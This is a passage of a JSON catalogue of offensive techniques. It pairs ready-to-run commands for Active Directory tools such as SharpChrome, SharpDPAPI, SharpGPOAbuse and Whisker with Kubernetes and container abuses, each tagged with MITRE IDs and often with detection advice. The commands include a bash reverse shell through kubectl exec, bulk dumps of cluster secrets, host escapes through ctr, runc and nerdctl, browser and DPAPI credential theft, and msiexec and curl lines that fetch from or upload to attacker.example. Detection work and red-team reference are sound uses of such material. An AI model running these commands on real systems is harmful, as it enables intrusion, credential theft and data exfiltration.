IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/ShutdownRepo/ShadowCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp"],"added":true},{"id":"wadcoms:SharpChrome-Logins","toolId":"wadcoms:SharpChrome","toolName":"SharpChrome","name":"SharpChrome-Logins","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"SharpChrome.exe logins /unprotect","description":"SharpChrome (part of the SharpDPAPI project) extracts Chromium-based browser secrets - saved logins, cookies, and credit cards - by resolving the browser's DPAPI-protected AES state key and decrypting the login database. The logins command with /unprotect uses the current user's DPAPI keys directly to reveal stored passwords in plaintext. Run it in the target user's session (or supply /pvk: with the domain backup key); it also supports /browser:edge and cookies output for session hijacking.\n\nCommand Reference:\n\n\tTarget browser: Chrome (current user profile)","mitre":["T1555.003"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/003/"],"added":true},{"id":"wadcoms:SharpDPAPI-Masterkeys-Credentials","toolId":"wadcoms:SharpDPAPI","toolName":"SharpDPAPI","name":"SharpDPAPI-Masterkeys-Credentials","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Decrypt the user's DPAPI masterkeys\nSharpDPAPI.exe masterkeys /password:password123\n\n# Decrypt Credential Manager blobs with the recovered masterkeys\nSharpDPAPI.exe credentials /mkfile:masterkeys.txt","description":"SharpDPAPI is a C# port of Mimikatz's DPAPI functionality for triaging Windows Data Protection API secrets. The masterkeys command decrypts the current user's DPAPI master keys (with /password: for their plaintext, or /pvk: with the domain backup key), writing a {GUID}:SHA1 lookup file. The credentials command then uses that /mkfile: to decrypt the user's Credential Manager blobs to plaintext. Run it from the user's own context or an elevated shell; it avoids dropping Mimikatz on disk.\n\nCommand Reference:\n\n\tPassword: password123\n\n\tMasterkey file: masterkeys.txt","mitre":["T1555.004"],"requires":["Shell","Password"],"services":["NTLM"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"added":true},{"id":"wadcoms:SharpGPOAbuse-AddLocalAdmin","toolId":"wadcoms:SharpGPOAbuse","toolName":"SharpGPOAbuse","name":"SharpGPOAbuse-AddLocalAdmin","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Lateral Movement","Persistence"],"nativeCategory":["PrivEsc","Lateral Movement","Persistence"],"command":"SharpGPOAbuse.exe --AddLocalAdmin --UserAccount john --GPOName \"Vulnerable GPO\"","description":"SharpGPOAbuse abuses edit rights over a Group Policy Object to push malicious settings to every computer/user in the GPO's scope. --AddLocalAdmin injects a Restricted Groups / GptTmpl.inf entry that adds the specified account to the local Administrators group on all machines the GPO applies to. You must already have write access to the target GPO (found via PowerView's Get-DomainGPO ACLs); changes take effect at the next Group Policy refresh, so consider forcing gpupdate on target hosts.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO","mitre":["T1484.001"],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true},{"id":"wadcoms:SharpGPOAbuse-AddUserRights","toolId":"wadcoms:SharpGPOAbuse","toolName":"SharpGPOAbuse","name":"SharpGPOAbuse-AddUserRights","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"SharpGPOAbuse.exe --AddUserRights --UserRights \"SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight\" --UserAccount john --GPOName \"Vulnerable GPO\"","description":"SharpGPOAbuse --AddUserRights assigns Windows privileges / logon rights to an account through an editable GPO, writing them into the GPO's security template. Granting rights such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeRemoteInteractiveLogonRight to a controlled user provides a durable escalation and remote-logon foothold across every host in scope. The --UserRights list is comma-separated and case-sensitive and must use the exact NT privilege constant names.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO","mitre":["T1484.001"],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true},{"id":"wadcoms:SharpView-Enumeration","toolId":"wadcoms:SharpView","toolName":"SharpView","name":"SharpView-Enumeration","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Kerberoastable accounts\nSharpView.exe Get-DomainUser -SPN\n# AS-REP roastable accounts\nSharpView.exe Get-DomainUser -PreauthNotRequired\n# Interesting ACLs with resolved GUIDs\nSharpView.exe Find-InterestingDomainAcl -ResolveGUIDs","description":"SharpView is a .NET/C# port of PowerView that exposes the same function names and parameters as a compiled executable, useful when PowerShell is locked down (Constrained Language Mode, AMSI/logging on script hosts) but arbitrary binaries still run. Each PowerView function becomes a positional first argument, and switches keep their PowerView names. It is handy for one-shot enumeration such as pulling kerberoastable accounts or interesting ACLs from a beacon.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/tevora-threat/SharpView","https://github.com/PowerShellMafia/PowerSploit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:SpoolSample-PrinterBug","toolId":"wadcoms:SpoolSample","toolName":"SpoolSample","name":"SpoolSample-PrinterBug","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"SpoolSample.exe 10.10.10.1 10.10.10.2","description":"SpoolSample.exe is the original Windows C# implementation of the PrinterBug (MS-RPRN) coercion technique. Run from an existing foothold on a domain-joined Windows host, it calls the print spooler's change-notification RPC on the target to force that target's machine account to authenticate back to a capture server, which is typically an ntlmrelayx or Responder listener. It is the on-host counterpart to printerbug.py and useful when operating entirely from a compromised Windows box under an existing user context. Requires the Print Spooler service to be running on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tCapture Server IP: 10.10.10.2","mitre":[],"requires":["Shell"],"services":["RPC","NTLM"],"references":["https://github.com/leechristensen/SpoolSample","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"added":true},{"id":"wadcoms:SweetPotato-SeImpersonate","toolId":"wadcoms:SweetPotato","toolName":"SweetPotato","name":"SweetPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# -e selects the coercion primitive (EfsRpc | DCOM | WinRM | PrintSpoofer | PetitPotam)\nSweetPotato.exe -p C:\\Windows\\System32\\cmd.exe -a \"/c whoami\" -e EfsRpc","description":"SweetPotato bundles several SYSTEM-coercion primitives (EfsRpc, DCOM/RoguePotato-style OXID, PrintSpoofer, PetitPotam, WinRM) behind one binary, selected with -e, so you can fall back to whichever named-pipe or DCOM coercion the host permits. It captures the coerced SYSTEM token and launches the program in -p with the arguments in -a. Handy on IIS/MSSQL service accounts when you want to try multiple potato techniques without swapping tools. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tExploit mode: EfsRpc","mitre":[],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/CCob/SweetPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:Whisker-ShadowCredentials","toolId":"wadcoms:Whisker","toolName":"Whisker","name":"Whisker-ShadowCredentials","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Add a shadow credential to the target and get the follow-up Rubeus command\nWhisker.exe add /target:victim /domain:test.local /dc:dc.test.local","description":"Whisker is a C# tool that manipulates the msDS-KeyCredentialLink attribute to perform the Shadow Credentials attack from a Windows host. `Whisker.exe add` generates a certificate, adds the corresponding key credential to the target object, and prints a ready-to-run Rubeus asktgt PKINIT command to authenticate as the victim and recover its NT hash. It requires GenericWrite/GenericAll over the target and a DC that supports PKINIT (an enterprise CA present). Stealthier than a password reset because the account's password is unchanged.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: dc.test.local\n\n\tTarget account: victim","mitre":[],"requires":["Shell"],"services":["LDAP","ADCS"],"references":["https://github.com/eladshamir/Whisker","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"added":true},{"id":"daemon:kubectl:0","toolId":"daemon:kubectl","toolName":"kubectl","name":"Execute","source":"DAEMON","platform":["Linux","Windows"],"capability":["Execution","Reverse/Bind Shell"],"nativeCategory":["Execute","Container Administration"],"command":"kubectl exec -it pod-x -n ns-x -- /bin/sh\nkubectl exec pod-x -n ns-x -- bash -c \"bash -i >& /dev/tcp/10.10.10.10/4444 0>&1\"","description":"Runs an arbitrary command inside an already-running pod through the Kubernetes API's pods/exec subresource, giving an interactive shell without deploying anything new. With a token that has the exec verb, an operator can pivot into any reachable workload and, as shown, spawn a reverse shell back to a listener.","usecase":"Interactively run commands or pop a shell inside an existing pod using only exec RBAC, avoiding creation of new objects.","mitre":["T1609"],"privilege":"user","detection":[{"type":"Detection","value":"Kubernetes API audit log create events on the pods/exec subresource (objectRef.subresource=exec). Alert on exec into production/system namespaces, exec by service-account identities that normally never exec, and exec commands spawning shells (sh, bash, /dev/tcp). Correlate with kubelet logs."}],"references":["https://attack.mitre.org/techniques/T1609/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/"],"added":true,"verifyNote":"MITRE T1609 page explicitly names `kubectl exec` as a procedure; kubectl_exec generated docs confirm -it/-n/-- syntax. Binary absent from GTFOBins/LOLBAS/WADComs."},{"id":"daemon:kubectl:1","toolId":"daemon:kubectl","toolName":"kubectl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access"],"command":"kubectl get secrets --all-namespaces -o json\nkubectl get secret secret-x -n ns-x -o jsonpath='{.data.token}' | base64 -d","description":"Lists Kubernetes Secret objects and dumps their contents. Secret data is only base64-encoded in the API, so a single get/list on the secrets resource returns service-account tokens, registry pull creds, TLS keys and app passwords in recoverable form. --all-namespaces harvests every namespace the identity can read.","usecase":"Harvest tokens, cloud keys and passwords cluster-wide from the API when the compromised identity holds get/list on secrets.","mitre":["T1552.007"],"privilege":"user","detection":[{"type":"Detection","value":"Enable RequestResponse-level audit on the secrets resource. Alert on list/get across many namespaces or all-namespaces, especially from service accounts. Red Canary Atomic T1552.007 mirrors this. Watch /api/v1/secrets and /api/v1/namespaces/*/secrets GET/LIST spikes."}],"references":["https://attack.mitre.org/techniques/T1552/007/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md","https://kubernetes.io/docs/concepts/configuration/secret/"],"added":true,"verifyNote":"MITRE T1552.007 (Container API) description explicitly covers using the Kubernetes API to retrieve Secrets; Red Canary Atomic T1552.007 replicates `kubectl get secrets`. Secrets are base64, not encrypted (k8s Secret docs)."},{"id":"daemon:kubectl:2","toolId":"daemon:kubectl","toolName":"kubectl","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Deploy Container"],"command":"kubectl run pod-x -n ns-x --restart=Never -it --rm --image=alpine --overrides='{\"spec\":{\"hostPID\":true,\"containers\":[{\"name\":\"c\",\"image\":\"alpine\",\"stdin\":true,\"tty\":true,\"command\":[\"/bin/sh\"],\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"name\":\"host\",\"mountPath\":\"/host\"}]}],\"volumes\":[{\"name\":\"host\",\"hostPath\":{\"path\":\"/\"}}]}}'\n# then inside: chroot /host sh","description":"Uses the --overrides flag of kubectl run to inject a raw pod spec that is privileged, shares the host PID namespace and mounts the node root filesystem via a hostPath volume. Once scheduled, chroot /host yields a root shell on the underlying node, escaping the cluster's isolation boundary.","usecase":"Escape from cluster tenant to full node root when the identity can create pods with privileged/hostPath specs (no PodSecurity restricted).","mitre":["T1611","T1610"],"privilege":"user","detection":[{"type":"Detection","value":"Audit pods/create where securityContext.privileged=true, hostPID/hostNetwork/hostIPC=true, or volumes[].hostPath is set (especially path /). Enforce Pod Security Admission 'restricted' or an admission controller (OPA/Kyverno) to block these specs and alert on rejections."}],"references":["https://attack.mitre.org/techniques/T1611/","https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"],"added":true,"verifyNote":"`--overrides` is a documented kubectl run flag (inline JSON merged into the generated object); kubernetes/kubectl#721 and HackTricks document it as the privileged/hostPath escape workaround. T1611 (Escape to Host)+T1610 (Deploy Container) correct."},{"id":"daemon:kubectl:3","toolId":"daemon:kubectl","toolName":"kubectl","name":"Node Access","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","File Read"],"nativeCategory":["Node Access","Escape to Host"],"command":"kubectl debug node/node-x -it --image=alpine --profile=sysadmin\n# then inside the debug pod: chroot /host sh","description":"kubectl debug node creates a debugging pod that runs in the target node's host namespaces with the node root filesystem mounted at /host. Combined with --profile=sysadmin (privileged) and chroot /host it provides root-level access to the node's disk and processes, a supported feature repurposed for host takeover.","usecase":"Obtain node filesystem/root access through the sanctioned node-debug path when create-pods on nodes is permitted.","mitre":["T1611"],"privilege":"user","detection":[{"type":"Detection","value":"Audit for pod create with names matching node-debugger-* and node-scoped debug pods carrying host namespaces or --profile=sysadmin. Alert on debug pods mounting /host or running chroot. Restrict the node/debug capability via RBAC."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/kubectl-node-debug/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_debug/"],"added":true,"verifyNote":"kubernetes.io 'Debugging Kubernetes Nodes With Kubectl' page (fetched live) confirms node root mounts at /host, that plain debug is not privileged so chroot /host fails unless `--profile=sysadmin` is used; T1611. Both refs live."},{"id":"daemon:kubectl:4","toolId":"daemon:kubectl","toolName":"kubectl","name":"File Copy","source":"DAEMON","platform":["Linux","Windows"],"capability":["File Copy","Collection"],"nativeCategory":["File Copy","Collection"],"command":"kubectl cp ns-x/pod-x:/etc/passwd /tmp/x\nkubectl cp /tmp/x ns-x/pod-x:/tmp/x","description":"Copies files and directories out of or into a pod. Under the hood kubectl cp streams a tar archive through the pods/exec subresource (the container image must contain tar), so it doubles as a data-exfiltration and tool-staging channel that only needs exec permission.","usecase":"Pull sensitive files out of a pod or stage attacker tooling into it using nothing but exec/cp rights.","mitre":["T1609"],"privilege":"user","detection":[{"type":"Detection","value":"cp rides pods/exec, so audit exec create events invoking tar (command contains 'tar -cf -' or 'tar -xmf -'). Alert on exec+tar into/out of sensitive workloads and on large streamed transfers correlated with exec sessions."}],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_cp/","https://attack.mitre.org/techniques/T1609/"],"added":true,"verifyNote":"kubectl_cp generated docs confirm cp streams a tar via the exec subresource and requires tar in the container image; T1609 justified because cp executes tar in-container. Absent from GTFOBins/LOLBAS."},{"id":"daemon:kubectl:5","toolId":"daemon:kubectl","toolName":"kubectl","name":"Discovery","source":"DAEMON","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"kubectl auth can-i --list\nkubectl auth can-i create pods -n ns-x\nkubectl auth can-i --list --as=system:serviceaccount:ns-x:sa-x","description":"Queries the RBAC authorizer (SelfSubjectRulesReview / SelfSubjectAccessReview) to enumerate exactly which resources and verbs the current identity is allowed. --list dumps the full permission matrix; --as combines with impersonation rights to map another subject's power without using its credentials.","usecase":"Enumerate the compromised token's RBAC reach (and plan escalation) before taking any noisy action.","mitre":["T1069"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create events on selfsubjectrulesreviews / selfsubjectaccessreviews (a public Sigma rule flags RBAC permission listing). A burst of can-i / --list right after a new token appears is a strong recon signal; alert on impersonation (--as) combined with these reviews."}],"references":["https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access","https://detection.fyi/sigmahq/sigma/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing/"],"added":true,"verifyNote":"can-i --list uses SelfSubjectRulesReview (k8s authz docs, 'Checking API access'); detection.fyi Sigma rule 'RBAC Permission Enumeration Attempt' fetched live (it tags T1069.003/T1087.004 — parent T1069 retained as correct)."},{"id":"daemon:kubectl:6","toolId":"daemon:kubectl","toolName":"kubectl","name":"Lateral Movement","source":"DAEMON","platform":["Linux"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement","Proxy"],"command":"kubectl port-forward svc/svc-x -n ns-x 8080:80\nkubectl port-forward --address 0.0.0.0 pod-x -n ns-x 8080:8080","description":"Opens a tunnel from the operator's machine, through the API server and kubelet, to a port on a pod or service via the pods/portforward subresource. This reaches ClusterIP-only services (databases, internal admin UIs, dashboards) that are otherwise unroutable, and --address 0.0.0.0 can expose the tunnel to other hosts.","usecase":"Reach cluster-internal services (DBs, dashboards, metadata proxies) from outside without deploying a pod.","mitre":["T1090.001"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create on the pods/portforward subresource (objectRef.subresource=portforward). Alert on port-forward to sensitive services (etcd, databases, dashboards), long-lived forwards, and --address bindings other than localhost."}],"references":["https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#port-forward","https://attack.mitre.org/techniques/T1090/001/"],"added":true,"verifyNote":"Command real: `kubectl port-forward` with the pods/portforward subresource and the `--address` flag are documented in kubectl docs. FIX: MITRE changed T1609->T1090.001 (Internal Proxy) and reference swapped accordingly — T1609 is defined as executing commands within a container, which port-forward does not do; it establishes a proxy tunnel to internal services."},{"id":"daemon:kubectl:7","toolId":"daemon:kubectl","toolName":"kubectl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Token Request"],"command":"kubectl create token sa-x -n ns-x --duration=999999h","description":"Requests a bound service-account token through the TokenRequest API. An identity that can create serviceaccounts/token for a more-privileged service account can mint a fresh bearer token for it and assume its permissions, with --duration pushing the expiry far out.","usecase":"Mint a valid bearer token for a higher-privileged service account to escalate or persist.","mitre":["T1528"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create on the serviceaccounts/token subresource (TokenRequest). Alert when a subject requests tokens for service accounts it does not own, on unusually long --duration / requested expirationSeconds, and on token requests for privileged SAs (e.g. cluster-admin-bound)."}],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_create/kubectl_create_token/","https://attack.mitre.org/techniques/T1528/"],"added":true,"verifyNote":"kubectl_create_token generated docs confirm `create token` is backed by the TokenRequest API and that `--duration` sets the requested token lifetime; T1528 (Steal Application Access Token) fits assuming a higher-priv SA. Server may cap very long durations, but the flag is real."},{"id":"daemon:kubectl:8","toolId":"daemon:kubectl","toolName":"kubectl","name":"Discovery","source":"DAEMON","platform":["Linux","Windows"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"kubectl get pods -A -o wide\nkubectl get nodes -o wide\nkubectl get all -A -o yaml","description":"Enumerates cluster resources: pods and their node placement/IPs, nodes and addresses, and full object manifests. -o yaml exposes environment variables, mounted volumes, image references and annotations that frequently leak credentials and reveal the escape/lateral-movement surface.","usecase":"Map workloads, nodes and embedded config/secrets to plan lateral movement and host escape.","mitre":["T1613"],"privilege":"user","detection":[{"type":"Detection","value":"Audit high-volume list/get across pods, nodes and other resources (especially -A / cluster-scoped) from a single identity in a short window. Baseline normal read patterns per service account and alert on broad enumeration by identities that usually touch one namespace."}],"references":["https://attack.mitre.org/techniques/T1613/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_get/"],"added":true,"verifyNote":"kubectl_get generated docs confirm -A/--all-namespaces, -o wide and -o yaml; T1613 (Container and Resource Discovery) is the correct technique for cluster resource enumeration."},{"id":"daemon:crictl:9","toolId":"daemon:crictl","toolName":"crictl","name":"Execute","source":"DAEMON","platform":["Linux"],"capability":["Execution"],"nativeCategory":["Execute","Container Administration"],"command":"crictl ps\ncrictl exec -it CONTAINERID sh","description":"crictl is the CRI debugging CLI that talks directly to the node's container runtime (containerd/CRI-O) socket, bypassing the API server and kubelet policy entirely. From a compromised node, crictl ps lists running containers and crictl exec drops an interactive shell into any of them, including other tenants' workloads.","usecase":"On a node, execute into any running container out-of-band of the Kubernetes API and its RBAC/audit.","mitre":["T1609"],"privilege":"admin","detection":[{"type":"Detection","value":"Node-level process/auditd monitoring: exec of crictl (and containerd-shim/runc exec children) not originating from kubelet. These actions bypass API audit, so rely on host EDR and file/socket access to /run/containerd/containerd.sock or /var/run/crio/crio.sock."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1609/"],"added":true,"verifyNote":"kubernetes.io crictl debug docs and cri-tools confirm `crictl ps` and `crictl exec -it`; crictl speaks directly to the CRI socket, bypassing apiserver/RBAC/audit. Not a GTFOBins/LOLBAS binary; T1609."},{"id":"daemon:crictl:10","toolId":"daemon:crictl","toolName":"crictl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access","Discovery"],"nativeCategory":["Credential Access","Discovery"],"command":"crictl ps -a\ncrictl inspect CONTAINERID","description":"crictl inspect returns a container's full CRI status JSON including its environment variables, command line, mounts and labels. Applications commonly pass secrets (DB passwords, API keys, tokens) as env vars, so inspecting containers on a node reveals those plaintext values without touching Kubernetes Secret objects or the API server.","usecase":"Read plaintext env-var secrets and mount layout of colocated containers straight from the node runtime.","mitre":["T1552.007","T1613"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for crictl inspect / inspectp / inspecti invocations on nodes outside of sanctioned tooling, and for reads of the containerd/CRI-O socket. Prefer mounting secrets as files with restrictive modes over env vars to shrink this exposure."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1552/007/"],"added":true,"verifyNote":"cri-tools/crictl docs confirm `crictl inspect` returns container status JSON incl. env vars (and inspectp/inspecti variants exist); reading runtime-held env secrets fits T1552.007 (Container API) + T1613 discovery."},{"id":"daemon:ctr:11","toolId":"daemon:ctr","toolName":"ctr","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"ctr image pull {REMOTEURL}/ubuntu:latest\nctr run --privileged --net-host -t {REMOTEURL}/ubuntu:latest esc bash\nctr run --mount type=bind,src=/,dst=/host,options=rbind:rw -t {REMOTEURL}/ubuntu:latest esc chroot /host bash","description":"ctr is containerd's low-level admin client. With access to the containerd socket an operator can pull an image and launch a container with --privileged/--net-host, or bind-mount the node root (src=/) into the container; chroot /host then yields a root shell on the node. It bypasses the kube-apiserver and any admission control.","usecase":"Turn containerd socket access on a node into node root via a privileged or host-bind-mount container.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for ctr invocations carrying --privileged, --net-host, or --mount type=bind,src=/ , and for access to /run/containerd/containerd.sock by non-kubelet processes. New containerd tasks from unexpected images/registries on a node are high-signal."}],"references":["https://hacktricks.wiki/en/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.html","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"HackTricks containerd-ctr page confirms the exact `ctr run --privileged --net-host` and `ctr run --mount type=bind,src=/,dst=/...` host-mount escapes; ctr is not a GTFOBins binary; T1611. (options=rbind:rw is a benign superset of the documented options=rbind.)"},{"id":"daemon:runc:12","toolId":"daemon:runc","toolName":"runc","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"runc spec\n# edit config.json mounts: {\"type\":\"bind\",\"source\":\"/\",\"destination\":\"/\",\"options\":[\"rbind\",\"rw\",\"rprivate\"]}\nmkdir rootfs\nrunc run esc","description":"runc is the OCI runtime under Docker/containerd/CRI-O. Where runc is available with root, an operator can generate an OCI bundle with runc spec, edit config.json to bind-mount the host root (source \"/\") into the container, and runc run it, producing a container whose filesystem is the node's, granting full host access outside any orchestration policy.","usecase":"Spawn an OCI container that bind-mounts the host root to reach node root when runc is runnable as root.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for runc spec and runc run invocations that are not children of containerd-shim/dockerd (i.e. manual bundles), and for config.json files whose mounts bind source \"/\". Flag new OCI bundle directories written to disk followed by runc run."}],"references":["https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"HackTricks runc page confirms `runc spec` -> edit config.json to bind-mount source '/' -> `runc run`; also confirms runc must run as root (privilege=admin). T1611; runc is not a GTFOBins binary."},{"id":"daemon:docker:13","toolId":"daemon:docker","toolName":"docker","name":"Collection","source":"DAEMON","platform":["Linux"],"capability":["Collection","File Read"],"nativeCategory":["Collection","Data Staging"],"command":"docker cp CONTAINERID:/etc/shadow /tmp/x\ndocker export CONTAINERID -o /tmp/x.tar\ndocker save IMAGE:latest -o /tmp/x.tar","description":"With Docker daemon access, docker cp pulls individual files out of any container's filesystem, docker export writes a tar snapshot of a container's whole filesystem, and docker save archives full images (all layers/history). Together they let an operator harvest other containers' files, embedded secrets and build-time credentials from a single node.","usecase":"Collect files, filesystem snapshots and image layers (with baked-in secrets) from colocated containers.","mitre":["T1005"],"privilege":"admin","detection":[{"type":"Detection","value":"docker events for export/save/cp actions and auditd for large tar writes by dockerd; flag export/save of containers or images the user did not create, and cp reads of sensitive paths (/etc/shadow, mounted secret volumes). Baseline legitimate backup jobs to reduce noise."}],"references":["https://docs.docker.com/reference/cli/docker/container/export/","https://docs.docker.com/reference/cli/docker/image/save/","https://attack.mitre.org/techniques/T1005/"],"added":true,"verifyNote":"docker export/save/cp CLI docs confirm the commands and -o/--output (export page fetched live). Criterion (e) caveat: `docker cp` overlaps the existing GTFOBins docker File-read/File-write functions, but `docker export`/`docker save` (whole-filesystem and whole-image tar for bulk collection, T1005) are additive and absent from GTFOBins — kept for that additive value."},{"id":"daemon:nerdctl:14","toolId":"daemon:nerdctl","toolName":"nerdctl","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"nerdctl run --privileged --rm -it -v /:/host alpine chroot /host sh","description":"nerdctl is the Docker-compatible CLI for containerd and accepts docker run flags. On a node with containerd, an operator can run a --privileged container that bind-mounts the host root (-v /:/host) and chroot /host to obtain node root, the same host-mount escape as docker/ctr but through the nerdctl front-end.","usecase":"Escape to node root via containerd using familiar docker-style --privileged and host-mount flags.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for nerdctl invocations with --privileged or -v /:/ (host-root bind) and for new containerd tasks not launched by kubelet. Restrict access to the containerd socket and to the nerdctl binary; alert on chroot into a host-root mount inside a container."}],"references":["https://github.com/containerd/nerdctl/blob/main/docs/command-reference.md","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"nerdctl command-reference confirms Docker-compatible `--privileged` and `-v` bind mounts; same host-mount escape as docker but nerdctl is NOT a GTFOBins/LOLBAS binary, so the entry is additive; T1611."},{"id":"daemon:msiexec:15","toolId":"daemon:msiexec","toolName":"msiexec.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","AWL / Policy Bypass"],"nativeCategory":["Execute"],"command":"msiexec /q /i https://attacker.example/x.msi","description":"The signed Windows Installer fetches and silently installs a remote MSI; the package's custom actions run arbitrary code under the trusted msiexec host. A signed vendor MSI can also be paired with a malicious remote transform: msiexec /i C:\\Windows\\Temp\\x.msi TRANSFORMS=\"https://attacker.example/x.mst\" /qb.","usecase":"Proxy execution of attacker code through a trusted, signed installer, including from a remote URL.","mitre":["T1218.007","T1105"],"privilege":"user","detection":[{"type":"Detection","value":"msiexec.exe with an http(s):// argument or a network-facing parent; msiexec.exe spawning cmd.exe/powershell.exe/rundll32; MSI or MST files written into INetCache; TRANSFORMS= pointing at a URL."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msiexec.yml","https://attack.mitre.org/techniques/T1218/007/"],"added":true,"verifyNote":"LOLBAS Msiexec.yml quotes both `msiexec /q /i {REMOTEURL}` and `msiexec /i {PATH} TRANSFORMS=\"{REMOTEURL:.mst}\" /qb`, MitreID T1218.007; verbatim match."},{"id":"daemon:curl:16","toolId":"daemon:curl","toolName":"curl.exe","name":"Download","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["File Download","File Upload"],"nativeCategory":["Download","Upload"],"command":"curl.exe -o C:\\Windows\\Temp\\x.exe http://attacker.example/x.exe\ncurl.exe -T C:\\Windows\\Temp\\loot.zip http://attacker.example/upload/","description":"curl.exe has shipped in-box on Windows 10 since build 1803 (and on macOS/Linux for years). -o/--output writes a downloaded URL to a chosen path (ingress 